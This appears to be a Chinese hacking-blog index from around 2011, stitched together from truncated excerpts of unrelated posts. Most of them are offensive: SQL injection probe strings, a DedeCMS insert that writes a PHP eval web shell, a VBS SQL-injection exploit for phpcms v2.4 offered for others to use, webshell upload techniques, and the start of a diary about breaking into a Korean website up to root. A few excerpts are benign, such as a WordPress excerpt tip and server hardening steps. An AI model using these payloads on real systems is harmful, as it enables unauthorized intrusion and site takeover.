2011 0 第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。 否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。 数字型：and 1=1 and 1=2 判断是否存在注入 字符型：’ and ’1′=’1 ‘ and ’1′=’2 搜索型： 关键字%’ and 1=1 and ‘%’='% 关键字%’ and 1=2 and ‘%’='% IIS报错情况下使用： and user>0 （判断是ACCESS还是MSSQL） 不报...

运行则删除服务器Wｓｃｒｉｐｔ.Shell 　　命令行模式下执行：regsvr32/u C:windowsSystem32wshom.ocx 　　del C:windowsSystem32wshom.ocx 　　regsvr32/u C:windowssystem32shell32.dll 　　del C:windowssystem32shell32.dll 　　命令行模式下执行：regsvr32/u wshom.ocx回车、 　　regsvr32/u wshext.dll回车 　　搜索wshom.ocx，删除所有搜索到的内容。如果弹出Winodws系统文件保护对话框，则确认删除 　　搜索wshext.dll，删除所有搜索到的内容。如果弹出Winodws系统文件保护对话框，则确认删除 　　打开注...

在WordPress系统中，默认的首页和目录页使用的书全文输出，这对于文章内容较长的博客来说很不方面，下面我介绍一个方法，可以简单的实现在WordPress首页和目录页显示摘要而非全文。 　　首先找到wp-content/themes下你使用的模板目录，查找目录中的文件，如果有home.php则修改home.php，没有的话就修改index.php，找到<?php the_content(); ?>这一行，将其修改为以下代码：  <?php if(is_category() || is_archive() || is_home() ) {      the_excerpt();  } else {      the_content(‘Read the r...

通常状态下，蜘蛛日志的基本术语解释： 现在更多的网站是没有提供可以通过软件来查看的日志格式。更多的是类似下面的日志格式，如下： 　　03:28:34 GET http://bbs.fkzuzhi.cn/bbs.php 202.108.7.205 200 34696 390 　　第一 03:28:34 访问时间 　　第二 GET http://bbs.fkzuzhi.cn/bbs.php 访问的页面 get表示获取 　　第三 202.108.7.205 访问网站的源IP 　　第四 200 成功访问 　　第五 34696 390 表示记录的内容大小   下面是一个案例分析，大家可以参考一下：   http状态码[size=+0] 200 [size=+0]201...

话说无聊去代码网站下套程序分析分析 可到了这个云起企业建站系统 下载数挺多的 于是乎看了起来 首先看到了它的后台login.asp文件。。一看 边觉得蛋疼。。。   if request.Form(“submit”)<>”" then if request.Form(“userid”)=”" or request.Form(“password”)=”" then response.Write(“<script language=javascript>alert(‘用户名或者密码不能为空！’);history.back();</script>”) response.end end if   set rs=conn.execute(“select * from gly where uid=’”&trim(requ...

网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell www.t00ls.net5 G$ w& h” m! n9 S: G 前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,’{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \’<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’); 再用下面表单提交，shell 就在同目录下  1.php。原理自己研究。。。 ) O+ I’ L2 I% Y) E: ...

这里我们利用老y系统来说明问题。漏洞出现在js.asp文件中。   If CheckStr(Request(“ClassNo”)) <> “” then  ClassNo = split(CheckStr(Request(“ClassNo”)),”|”)  ‘这里是获取变量利用checkstr过滤，但是感觉好像没起作用。然后分成数组  on error resume next  NClassID = LaoYRequest(ClassNo(0))  NClassID1 = LaoYRequest(ClassNo(1))  ‘获取数组1，与数组2进行整形过滤。这里没有漏洞  End if  num = LaoYRequest(request.querystring(“num”))’这里num必须>=1  ……. ...

phpcms v2.4 SQL injection exploit。老古董的级别了。现在多2011版本了吧   哈。乱讲。貌似出09了？出自农村大牛的VBS版本EXP。有需要的拿去玩玩吧。   on   error   resume   next   Set objArgs = WScript.Arguments       dim my_http   dim my_path   dim fjhgx   print_r()       if objArgs.length = 0 then   quit_print()   End if   if objArgs(0) = null then           quit_print()   Else           my_http = objArgs(0)   End if       if objArgs(1) = null then           quit_print()   Else ...

一、直接上传获得webshell   这种对php和jsp的一些程序比较常见，MolyX BOARD就是其中一例，直接在心情图标管理上传.php类型，虽然没有提示，其实已经成功了，上传的文 件url应该是http://forums/images/smiles/下，前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名，bo-blog后台可以可以直接上传.php文件，上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统)，因过滤上传文件不严，导致用户可以直接上传webshell到网站任意可写目...

很久不写东西了，写个linux系统web到root的入侵笔记吧，简单来说过程没什么技术含量，看了可以为大提供一个不常用的上传思路，和新的linux本地权限提升漏洞的使用方法，以及介绍一款rootkit 。这事起因是有个朋友要K一个棒子（韩国）站，死活搞不定，就来骚扰我了，我现在是不怎么喜欢搞站的，偶尔搞搞也是搞点新鲜的玩玩，怕荒废了，最近几年主要还是研究逆向和漏洞方面的东西，不过这鸟人唐僧似的骚扰法整的我实在“心神不宁”，又不好意思拒绝，勉强帮忙看一下吧。过程如下： 首先用nmap检测一下目标网站的系统服...